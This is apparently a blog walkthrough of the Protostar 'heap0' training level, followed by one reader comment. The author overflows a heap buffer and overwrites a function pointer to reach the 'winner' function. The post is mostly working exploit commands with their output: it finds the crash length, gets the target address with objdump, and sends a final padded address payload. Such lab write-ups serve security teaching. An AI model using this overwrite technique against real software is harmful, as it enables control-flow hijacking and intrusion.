This level introduces heap overflows and how they can influence code flow. (link)
Source Code:
Ok this looks like it'll be similar to some of the stack overflow levels, except we want to overflow a data structure that's located on the heap.
First, let's see if we can overwrite f->fp() at all and cause a segfault:
user@protostar:/opt/protostar/bin$ ./heap0 $(python -c "print 'x'*70")
data is at 0x804a008, fp is at 0x804a050
level has not been passed
No. Let's try again with more data:
user@protostar:/opt/protostar/bin$ ./heap0 $(python -c "print 'x'*170")
data is at 0x804a008, fp is at 0x804a050
Segmentation fault
Got it!
Ok now let's find the address we want to overwrite f->fp() with:
user@protostar:/opt/protostar/bin$ objdump -t ./heap0 | grep "winner"
08048464 g F .text 00000014 winner
08048478 g F .text 00000014 nowinner
Ok, now let's overwrite f->fp() with that address:
user@protostar:/opt/protostar/bin$ ./heap0 $(python -c "print 'x'*72 + '\x64\x84\x04\x08'")data is at 0x804a008, fp is at 0x804a050
level passed
Done!
Great, Thanks !
ReplyDelete